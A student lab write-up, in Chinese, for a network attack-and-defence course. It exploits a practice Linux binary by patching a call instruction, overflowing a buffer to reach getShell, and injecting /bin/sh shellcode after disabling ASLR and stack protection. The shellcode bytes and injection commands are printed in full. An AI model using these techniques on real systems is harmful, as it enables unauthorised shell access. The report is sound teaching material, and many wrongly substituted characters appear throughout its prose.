20155330 《网络攻防》Exp1 PC平台逆向破解(5)M

20155330 《网络攻防》Exp1 PC平台逆向破解(5)M

实践目标

运行pwn1可执行文件中的getshell函数，学习如何注入运行任何Shellcode
本次实践的对象是一个名为pwn1的linux可执行文件。

实践内容

• 手工修改可执行文件，改变程序执行流程，直接跳转到getShell函数。
• 利用foo函数的Bof漏洞，构造一个攻击输入字符串，覆盖返回地址，触发getShell函数。
• 注入一个本身制做的shellcode并运行这段shellcode。

基本思路

• 运行本来不可访问的代码片断
• 强行修改程序执行流
• 以及注入运行任意代码。

相关知识

• 熟悉Linux基本操做
  • 能看懂经常使用指令,如管道（|），输入、输出重定向（>）等。
• 理解Bof的原理。
  • 能看得懂汇编、机器指令、EIP、指令地址。
• 会使用gdb,vi。
• 指令
  • NOP：经过nop指令的填充（nop指令一个字节），使指令按字对齐，从而减小取指令时的内存访问次数。（机器码：90）
  • JNE：条件转移指令，若是不相等则跳转。（机器码：75）
  • JE：条件转移指令，若是相等则跳转。（机器码：74）
  • JMP：无条件转移指令。
    • 段内直接短转Jmp short（机器码：EB）
    • 段内直接近转移Jmp near（机器码：E9）
    • 段内间接转移Jmp word（机器码：FF）
    • 段间直接(远)转移Jmp far（机器码：EA）
  • CMP：比较指令，至关于减法指令,只是不保存结果。执行后，对标志寄存器产生影响。其余相关指令经过识别这些被影响的标志寄存器位来得知比较结果。

    • 机器码

      机器码	指令功能
      38	CMP reg8/mem8,reg8
      39	CMP reg16/mem16,reg16
      3A	CMP reg8,reg8/mem8
      3B	CMP reg16,reg16/mem16
      3C	CMP al,immed8
      3D	CMP ax,immed16

1、直接修改程序机器指令，改变程序执行流程

• 首先对pwn1文件进行反汇编

• 查看main函数调用foo的地址值，foo函数的第一条指令的地址值，和须要修改的getShell函数第一条指令的地址值。由下图可知，main函数调用foo对应机器指令为e8 d7ffffff，因为要将调用的函数更改成getShell，则需修改d7 ff ff ff为getShell-80484ba对应的补码，经过计算47d-4ba获得补码，main函数调用getShell对应机器指令为c3 ff ff ff。
  

• 使用VIM编辑器对pwn1文件进行编辑。文件显示为乱码，用%!xxd命令将显示模式切换为16进制模式
  

• 输入/e8 d7查找要修改的内容,修改d7为c3,用命令%!xxd -r将16进制转换为原格式，wq存盘退出。
  

• 再次将文件反汇编，能够看到地址80484b5的机器指令d7变动为c3，main函数调用getShell
  

• 运行文件。（在实践过程当中从新备份了pwn1文件为pwn2，以上步骤为备份前截图，备份后将pwn1文件修改成原文件。）

2、经过构造输入参数，形成BOF攻击，改变程序执行流

• 目标:触发getShell函数

• pwn1可执行文件正常运行是调用以下函数foo，这个函数有Buffer overflow漏洞

• 读入字符串，但系统只预留了__字节的缓冲区，超出部分会形成溢出，咱们的目标是覆盖返回地址

• main函数中call调用foo,同时在堆栈上压上返回地址值:80484ba

• 确认输入字符串哪几个字符会覆盖到返回地址

  • gdb pwn3_155330调试可执行文件，r运行，info r查看寄存器eip（即将执行的指令地址）的值

  • 再次运行，将后八位值更改后发现eip值改变。1234 四个数最终会覆盖到堆栈上的返回地址，进而CPU会尝试运行这个位置的代码。将这四个字符替换为 getShell 的内存地址，输给pwn，pwn1就会运行getShell。

• 确认用什么值来覆盖返回地址
  • 经过反汇编时能够看到getShell的内存地址为0804847d。接下来要确认下字节序，简单说是输入\x08\x04\x84\x7d,仍是输入\x7d\x84\x04\x08。对比以前的eip，该终端采用小端方式，正确应用输入\x7d\x84\x04\x08。
  • 由为咱们无法经过键盘输入\x7d\x84\x04\x08这样的16进制值，因此先生成包括这样字符串的一个文件。\x0a表示回车，若是没有的话，在程序运行时就须要手工按一下回车键。
  • 用perl命令生成字符串并重定向>到input文件中。
    
  • 使用16进制查看指令xxd查看input文件的内容
    
  • 将input的输入，经过管道符“|”，做为pwn1的输入。
    
    

3、注入Shellcode并执行

• 准备一段Shellcode
  • shellcode就是一段机器指令（code）
  • 一般这段机器指令的目的是为获取一个交互式的shell（像linux的shell或相似windows下的cmd.exe），因此这段机器指令被称为shellcode。
  • 在实际的应用中，凡是用来注入的机器指令段都通称为shellcode，像添加一个用户、运行一条指令。

• execstack -s pwn1设置堆栈可执行。

• apt-get install execstack获取安装。

• execstack -q pwn1查询文件的堆栈是否可执行。并依次执行如下命令。

more /proc/sys/kernel/randomize_va_space 
echo "0" > /proc/sys/kernel/randomize_va_space
more /proc/sys/kernel/randomize_va_space

• 构造要注入的payload。

• Linux下有两种基本构造攻击buf的方法：
  • retaddr+nop+shellcode
  • nop+shellcode+retaddr。

• 由于retaddr在缓冲区的位置是固定的，shellcode要不在它前面（缓冲区大），要不在它后面（缓冲区小）。

• 结构为：nops+shellcode+retaddr。
  • nop一为是了填充，二是做为“着陆区/滑行区”。
  • 猜想的返回地址只要落在任何一个nop上，就能滑到shellcode。

• 输入perl -e 'print "\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x4\x3\x2\x1\x00"' > input_shellcode，最后的\x4\x3\x2\x1将覆盖到堆栈上的返回地址的位置。把\x4\x3\x2\x1改成这段shellcode的地址。
  

• 打开一个终端注入这段攻击buf(cat input_shellcode;cat) | ./pwn4_155330
  
• 再开另一个终端，用gdb来调试进程。
• ps -ef | grep pwn4_155330查看进程号。grep pwn4_155330的进程号是2481
  
• gdb调试这个进程，查看注入buf的内存地址
  

• 设置断点

• 继续运行

• 查看esp寄存器值，

• 计算出地址值为d300，修改地址重定向到input_shellcode文件